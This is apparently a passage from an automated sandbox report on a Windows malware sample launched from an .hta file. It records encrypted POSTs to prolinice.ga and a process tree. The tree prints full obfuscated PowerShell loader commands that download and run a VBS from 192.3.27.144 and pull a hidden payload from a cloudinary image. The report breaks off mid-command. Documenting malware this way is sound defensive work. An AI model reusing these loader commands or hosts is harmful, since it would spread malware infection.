Jan 8, 2025 11:09:23.874442101 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874460936 CET	672	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874478102 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874494076 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874511957 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.874528885 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Jan 8, 2025 11:09:23.879501104 CET	1236	IN	Data Raw: 6c 5a 79 54 62 67 51 4c 70 31 54 70 51 41 53 4c 56 30 71 35 76 55 47 64 62 51 77 58 72 48 30 61 65 56 52 48 75 4e 43 45 68 30 53 4c 74 30 31 61 72 30 53 51 72 33 55 4c 74 75 36 42 64 73 42 76 6f 43 74 48 52 72 74 48 65 34 4b 65 30 6a 62 42 6a 56 Data Ascii: lZyTbgQLp1TpQASLV0q5vUGdbQwXrH0aeVRHuNCEh0SLt01ar0SQr3ULtu6BdsBvoCtHRrtHe4Ke0jbBjVxWTNmJ1oI1zvvEjNBetsVLskcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	46.173.214.14	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:09:48.884488106 CET	280	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prfkokybvrvkyi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: prolinice.ga
Jan 8, 2025 11:09:48.884529114 CET	337	OUT	Data Raw: 6e e2 91 f6 c3 38 f3 16 1c 16 c1 12 3a 50 f2 8f a9 27 91 5a 41 8e be ec 85 ec 0e 19 ad 4e 32 03 4b b3 ea b5 7b de 84 a6 12 cf c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 04 8f 94 9a Data Ascii: n8:P'ZAN2K{ &7H8.6hEv:RY;PL&3EpJ$fxu28$":4_OB/_#aQ[`[)odcb%&v.j.Je5~P$EBKQw'Xu&9xrwf;%^z5
Jan 8, 2025 11:09:49.834240913 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 10:09:49 GMT Server: Apache/2.4.59 (Debian) Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED] Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,\|WS}"w2bqv?OURB2hvt)U>P$\;QIzzdyW&Fv"-CL=pK@Bp^kQfsjDk$+KPPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E\| [}S2TqL L7@x!FEx{4@h;pg_Q@[N2H%s;"r21LVRvo9bN\|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO\|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3\|JY=R^Xo[#kn^T-la@9>$z\|kXv6]O8Rp\|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R\|~Yr [TRUNCATED]
Jan 8, 2025 11:09:49.834275007 CET	224	IN	Data Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gt
Jan 8, 2025 11:09:49.834285975 CET	1236	IN	Data Raw: 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8 06 83 3a dd 3c bd f3 ae 0b 02 a2 80 23 7f 02 79 66 c6 fa 48 ee 4a d1 79 d0 3c 96 bd 13 34 1f 1d 11 5e 2f 7c 94 67 02 e3 78 0f 84 ce c3 a5 b3 67 98 61 44 eb 06 Data Ascii: gcwmV`&$E^uAwI0q:<#yfHJy<4^/\|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z\|-t[DDgd/pXLid*C!@qv^=:g{$ybm<@
Jan 8, 2025 11:09:49.834301949 CET	1236	IN	Data Raw: e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de c1 ce 9f 6e 32 2b 10 77 b2 d9 30 2f 02 81 e1 38 a6 a6 13 f3 02 84 36 53 75 ea a1 a0 c1 cc 39 0a f5 bc 99 22 4d 2e 18 6b bc fe 95 24 d6 71 df 57 5b 91 50 f6 b4 Data Ascii: w\)85/QN\|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]FsF[7):lFp?.%8*s,t!tN2Y~
Jan 8, 2025 11:09:49.834322929 CET	448	IN	Data Raw: 61 75 c8 9e 29 8d 8f 4e 72 29 15 bc f2 3c 68 2f 82 44 67 71 60 3f 94 9d 7c 6c 44 9a d5 97 1d 7e 04 9e a2 63 5e 91 25 97 02 bc cb 75 1e 3d 91 36 4e 21 8c cb b0 d0 e4 5c eb b3 1b 7d da 01 14 01 4b 31 34 e6 fa 9c b0 4b 48 1a 3b 86 e0 7a 95 3c 1d 96 Data Ascii: au)Nr)<h/Dgq`?\|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#B>ef)wO/jHP:+ -/_A]K*_kkOly1Tp`\|_TI',
Jan 8, 2025 11:09:49.834367037 CET	1236	IN	Data Raw: 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9 44 35 47 af 75 f0 c8 bd 5d ac a3 ff 35 a9 bd ef 0a 49 c2 1c 95 c9 e7 ac 95 ab f8 c7 34 c9 97 34 a6 36 ce 46 88 14 64 cd 68 6a 1b bd 96 39 41 77 ff 29 d3 04 c0 Data Ascii: SO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5Lyc5\|
Jan 8, 2025 11:09:49.834378004 CET	1236	IN	Data Raw: 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a 8f 11 18 45 17 83 82 91 5f 0d 67 8e 0e f6 92 6e 1d 74 89 12 a1 b7 11 ce 3b 07 ba 3b f6 a7 2d 78 17 73 33 d9 9a 7e 10 a6 b9 46 d8 d0 c6 1e 77 30 78 58 64 b2 b6 Data Ascii: ?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sHXomSf%54m{gxKi.h_TKdFLN0xC
Jan 8, 2025 11:09:49.834389925 CET	448	IN	Data Raw: d7 ea 2f 55 6d f8 e1 71 30 d4 c0 d6 b1 5b 56 68 86 db 24 22 14 c7 75 6c 19 5b 7f 01 65 10 03 78 34 13 ae c8 b7 b0 d2 cd 13 3a b1 86 20 cc ba f6 a4 47 81 de 12 c9 42 38 d8 68 d7 83 2c 6c 80 56 56 d0 2d e6 5e 86 8a 43 a0 30 f0 83 5a 2d 9a 7a 64 a2 Data Ascii: /Umq0[Vh$"ul[ex4: GB8h,lVV-^C0Z-zdzJL_`e6.g%3Jaoc%]p'P]vm]q6@3\i@Yg>48\|[B\a:M-@+"ko?eQ]*6-T"Vbl
Jan 8, 2025 11:09:49.834484100 CET	1236	IN	Data Raw: 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14 6a e2 95 a1 99 f8 12 7d b0 e3 d3 ba 48 78 e2 e8 71 e9 9c e6 a3 dc 91 cb d4 a3 f1 0d 3a c6 3f b3 f3 d9 97 91 49 d3 be 04 Data Ascii: z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK4Zb4rdi 8?}jO;
Jan 8, 2025 11:09:49.834549904 CET	1236	IN	Data Raw: 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb aa 1d 89 45 99 38 5e 4c 93 a3 ec 34 c1 0a 2c cb dc 87 b2 14 06 72 07 32 c1 1b 09 c1 94 54 35 6e 39 6e 0d eb 44 30 ce f3 Data Ascii: }b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n_vULWvNzY&k:_@qfh)[\LMj8Lcyy:_w\|O\|:83GU.R=}:iq9[N

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	46.173.214.14	80	7272	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 11:09:53.438980103 CET	275	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prolinice.ga/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: prolinice.ga
Jan 8, 2025 11:09:53.439060926 CET	4431	OUT	Data Raw: 6e e2 91 f6 c3 38 f3 16 1c 16 c1 12 3a 50 f2 8f a9 27 91 5a 41 8e be ec 85 ec 0e 19 ad 4e 32 03 4b b3 ea b5 7b de 84 a6 12 cf c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2 Data Ascii: n8:P'ZAN2K{eug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x>x :xGresnq~j@%jux^2~mt-GD#SO`tAEi*y}`8
Jan 8, 2025 11:09:54.445406914 CET	584	IN	HTTP/1.1 404 Not Found Date: Wed, 08 Jan 2025 10:09:54 GMT Server: Apache/2.4.59 (Debian) Content-Length: 409 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

Target ID:	0
Start time:	05:08:54
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta"
Imagebase:	0xd50000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:08:54
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:08:54
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:08:54
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
Imagebase:	0x1f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:08:57
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
Imagebase:	0x3c0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:08:57
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"
Imagebase:	0x410000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:09:01
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
Imagebase:	0x670000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:09:02
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = 